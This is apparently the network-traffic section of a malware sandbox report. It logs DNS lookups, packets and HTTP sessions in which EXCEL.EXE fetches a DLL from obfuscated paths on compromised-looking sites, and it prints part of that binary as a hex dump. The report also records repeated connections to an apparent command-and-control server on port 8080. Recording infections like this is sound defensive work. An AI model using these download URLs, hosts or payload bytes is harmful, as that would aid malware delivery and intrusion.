                                                    May 23, 2022 09:19:25.737616062 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.737622976 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.737644911 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.737683058 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.738137007 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.738224983 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.738234043 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.738250017 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.738292933 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.738302946 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.745126009 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.239094019 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.239119053 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.239227057 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.239276886 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.239320040 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.239331961 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.239361048 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.239476919 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.358407021 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.358566999 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.358603954 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:26.358609915 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.358644962 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.358692884 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.358748913 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.359657049 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:26.359690905 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:28.973680973 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:29.015346050 CEST8049175193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:29.015440941 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:29.019248009 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:29.060909986 CEST8049175193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:31.049067020 CEST8049175193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:31.049225092 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:31.123563051 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:31.165396929 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:31.165544987 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:31.166353941 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:31.207897902 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260165930 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260215998 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260242939 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260267973 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260291100 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260314941 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260339975 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260344982 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260365963 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260373116 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260375977 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260380030 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260392904 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260406971 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260417938 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.260437965 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.260457039 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.261173964 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.261224985 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302309036 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302350044 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302375078 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302400112 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302423954 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302433014 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302450895 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302459955 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302464008 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302465916 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302468061 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302478075 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302479982 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302505970 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302515984 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302531958 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302536964 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302558899 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302562952 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302584887 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302591085 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302611113 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302618980 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302639008 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302644014 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302665949 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302670956 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302690983 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302696943 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302716970 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302722931 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302742958 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302747011 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302768946 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302773952 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302793980 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302799940 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302819967 CEST8049176193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:32.302824974 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:32.302850962 CEST4917680192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:33.049844980 CEST8049175193.143.77.34192.168.2.22
                                                    May 23, 2022 09:19:33.050051928 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:19:48.083465099 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:48.256905079 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.257087946 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:48.346781015 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:48.520054102 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.536345005 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.536405087 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.536614895 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:48.549870968 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:48.723057985 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.725663900 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:48.725812912 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.265361071 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.438674927 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.438779116 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.514395952 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.687668085 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.703618050 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.703653097 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.703773975 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.718173027 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:50.891459942 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.894134045 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:50.894256115 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:51.792747021 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:51.966296911 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:52.017543077 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:52.190871954 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:52.629477978 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:52.629703045 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:52.873570919 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:52.873663902 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:55.630580902 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:55.630618095 CEST808049179173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:55.630775928 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:55.874545097 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:55.874627113 CEST808049177173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:55.874655008 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:55.874687910 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:59.642301083 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:59.816121101 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:19:59.816200018 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:19:59.876319885 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:00.050039053 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:00.065025091 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:00.065053940 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:00.065108061 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:00.065306902 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:00.080734968 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:00.254055023 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:00.256560087 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:00.256627083 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:00.920012951 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:01.093472958 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:01.769525051 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:01.769751072 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:04.769853115 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:04.769954920 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:04.770006895 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:04.770030975 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:14.924658060 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:14.924894094 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:14.925209045 CEST4917180192.168.2.22188.114.97.10
                                                    May 23, 2022 09:21:14.942805052 CEST8049171188.114.97.10192.168.2.22
                                                    May 23, 2022 09:21:14.942939043 CEST4917180192.168.2.22188.114.97.10
                                                    May 23, 2022 09:21:15.302706003 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:15.396284103 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:15.895546913 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:16.207583904 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:17.143678904 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:17.814523935 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:19.546293974 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:21.028516054 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:24.351468086 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:27.440609932 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:33.961934090 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:37.745095968 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:37.745141029 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:39.924000978 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:39.924045086 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:40.249258995 CEST4917380192.168.2.22160.153.40.1

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 23, 2022 09:19:15.081226110 CEST5586853192.168.2.228.8.8.8
                                                    May 23, 2022 09:19:15.102648973 CEST53558688.8.8.8192.168.2.22
                                                    May 23, 2022 09:19:19.279834032 CEST4968853192.168.2.228.8.8.8
                                                    May 23, 2022 09:19:19.299406052 CEST53496888.8.8.8192.168.2.22
                                                    May 23, 2022 09:19:24.631736994 CEST5883653192.168.2.228.8.8.8
                                                    May 23, 2022 09:19:24.652940989 CEST53588368.8.8.8192.168.2.22
                                                    May 23, 2022 09:19:28.953943014 CEST5013453192.168.2.228.8.8.8
                                                    May 23, 2022 09:19:28.971402884 CEST53501348.8.8.8192.168.2.22
                                                    May 23, 2022 09:19:31.081562042 CEST5527553192.168.2.228.8.8.8
                                                    May 23, 2022 09:19:31.121392012 CEST53552758.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    May 23, 2022 09:19:15.081226110 CEST192.168.2.228.8.8.80x2ebcStandard query (0)vipteck.comA (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:19.279834032 CEST192.168.2.228.8.8.80xfee1Standard query (0)salledemode.comA (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:24.631736994 CEST192.168.2.228.8.8.80xf9bStandard query (0)airliftlimo.comA (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:28.953943014 CEST192.168.2.228.8.8.80x5ee0Standard query (0)kabeonet.plA (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:31.081562042 CEST192.168.2.228.8.8.80x852Standard query (0)www.kabeonet.plA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    May 23, 2022 09:19:15.102648973 CEST8.8.8.8192.168.2.220x2ebcNo error (0)vipteck.com188.114.97.10A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:15.102648973 CEST8.8.8.8192.168.2.220x2ebcNo error (0)vipteck.com188.114.96.10A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:19.299406052 CEST8.8.8.8192.168.2.220xfee1No error (0)salledemode.com160.153.40.1A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:24.652940989 CEST8.8.8.8192.168.2.220xf9bNo error (0)airliftlimo.com159.203.19.2A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:28.971402884 CEST8.8.8.8192.168.2.220x5ee0No error (0)kabeonet.pl193.143.77.34A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:31.121392012 CEST8.8.8.8192.168.2.220x852No error (0)www.kabeonet.plkabeonet.plCNAME (Canonical name)IN (0x0001)
                                                    May 23, 2022 09:19:31.121392012 CEST8.8.8.8192.168.2.220x852No error (0)kabeonet.pl193.143.77.34A (IP address)IN (0x0001)
                                                    May 23, 2022 09:19:49.792171001 CEST8.8.8.8192.168.2.220x1No error (0)windowsupdatebg.s.llnwi.net95.140.236.128A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • vipteck.com
                                                    • airliftlimo.com
                                                    • salledemode.com
                                                    • kabeonet.pl
                                                    • www.kabeonet.pl

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249172188.114.97.10443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.2249174159.203.19.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.2249171188.114.97.1080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    May 23, 2022 09:19:15.135399103 CEST2OUTGET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: vipteck.com
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:15.164824009 CEST3INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 23 May 2022 07:19:15 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Cache-Control: max-age=3600
                                                    Expires: Mon, 23 May 2022 08:19:15 GMT
                                                    Location: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s6qLK4kjD5bfy4rus9xkFLGcSyiCjdLx%2Br%2Ft61H%2FtgWWXQeFIFYRV4INLdcQUESx1uDQKREwn6goGmxhI%2BxiIP5ZKtK%2FbZbxX8MZYuVm9XyqGLtj7GHE0CvYFxB8hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    Server: cloudflare
                                                    CF-RAY: 70fc05afacd3912e-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.2249173160.153.40.180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    May 23, 2022 09:19:19.464550972 CEST391OUTGET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: salledemode.com
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:19.643933058 CEST393INHTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:19 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/7.2.34
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 23 May 2022 07:19:19 GMT
                                                    Content-Disposition: attachment; filename="me435CErJsFGw1q.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 628b3577889f1=1653290359; expires=Mon, 23-May-2022 07:20:19 GMT; Max-Age=60; path=/
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Last-Modified: Mon, 23 May 2022 07:19:19 GMT
                                                    Content-Length: 365056
                                                    Vary: Accept-Encoding
                                                    Strict-Transport-Security: max-age=300
                                                    Keep-Alive: timeout=5
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.
                                                    May 23, 2022 09:19:19.643959045 CEST394INData Raw: 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: reloc@B
                                                    May 23, 2022 09:19:19.643975973 CEST395INData Raw: 45 b0 f0 2d 7c 7e c7 45 b4 ec 2a 26 1a c7 45 b8 48 44 66 9d c7 45 bc 14 7c 50 76 c7 45 c0 2f 35 b6 2f c7 45 c4 72 6b 45 40 c7 45 c8 67 bf 2f 7b c7 45 cc 6d 62 50 76 c7 45 d0 98 20 2b 59 c7 45 d4 3c 09 64 ac c7 45 d8 e2 4d 20 7a c7 45 dc 24 06 55
                                                    Data Ascii: E-|~E*&EHDfE|PvE/5/ErkE@Eg/{EmbPvE +YE<dEM zE$UENbE0kj.ExiyE:!@E=MEBXE6E;#tEIE<*1E#\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_
                                                    May 23, 2022 09:19:19.643994093 CEST397INData Raw: 00 0e 75 4c f2 c7 85 08 02 00 00 33 e3 40 03 c7 85 0c 02 00 00 09 03 3e 82 c7 85 10 02 00 00 37 c3 2f 6a c7 85 14 02 00 00 a4 07 46 6c c7 85 18 02 00 00 3a 30 04 53 c7 85 1c 02 00 00 f2 78 41 38 c7 85 20 02 00 00 39 02 16 4e c7 85 24 02 00 00 bd
                                                    Data Ascii: uL3@>7/jFl:0SxA8 9N$`qY(Ye,N0:y4b%8<>N@o;ED(7Hp PL5P6CT& X2{\ePO`/CdT
                                                    May 23, 2022 09:19:19.644011974 CEST398INData Raw: 04 00 00 24 45 23 bf c7 85 20 04 00 00 a9 50 d2 78 c7 85 24 04 00 00 21 b9 a5 10 c7 85 28 04 00 00 43 2f e6 e0 c7 85 2c 04 00 00 5e 60 de e9 c7 85 30 04 00 00 23 28 a7 8b c7 85 34 04 00 00 1f 35 ee b8 c7 85 38 04 00 00 2b 4f b7 5c c7 85 3c 04 00
                                                    Data Ascii: $E# Px$!(C/,^`0#(458+O\<pu@&\hRD_lHbL+qP>TjfXX\Cb`42dq?h4%llpsoKt#xi|
                                                    May 23, 2022 09:19:19.644031048 CEST400INData Raw: 85 34 06 00 00 7b 24 55 7c c7 85 38 06 00 00 e0 fc 2d 85 c7 85 3c 06 00 00 95 45 1e 27 c7 85 40 06 00 00 d5 80 7d 42 c7 85 44 06 00 00 21 77 55 92 c7 85 48 06 00 00 65 d4 b4 28 c7 85 4c 06 00 00 73 9a 42 99 c7 85 50 06 00 00 d7 2b 4b 2a c7 85 54
                                                    Data Ascii: 4{$U|8-<E'@}BD!wUHe(LsBP+K*T.lX5\`Tg9doEhulCepd$t"aVx#d|?N3]='O5[(;.,
                                                    May 23, 2022 09:19:19.644047976 CEST401INData Raw: 95 c7 85 4c 08 00 00 31 76 66 08 c7 85 50 08 00 00 a9 28 45 21 c7 85 54 08 00 00 5b a0 6e e2 c7 85 58 08 00 00 46 4c 49 6e c7 85 5c 08 00 00 5f 24 bd 63 c7 85 60 08 00 00 b1 d1 43 35 c7 85 64 08 00 00 71 e1 68 d3 c7 85 68 08 00 00 94 b3 8d 66 c7
                                                    Data Ascii: L1vfP(E!T[nXFLIn\_$c`C5dqhhflApxt#$xGz|Q[nsmKa?<J(+y@p3zm
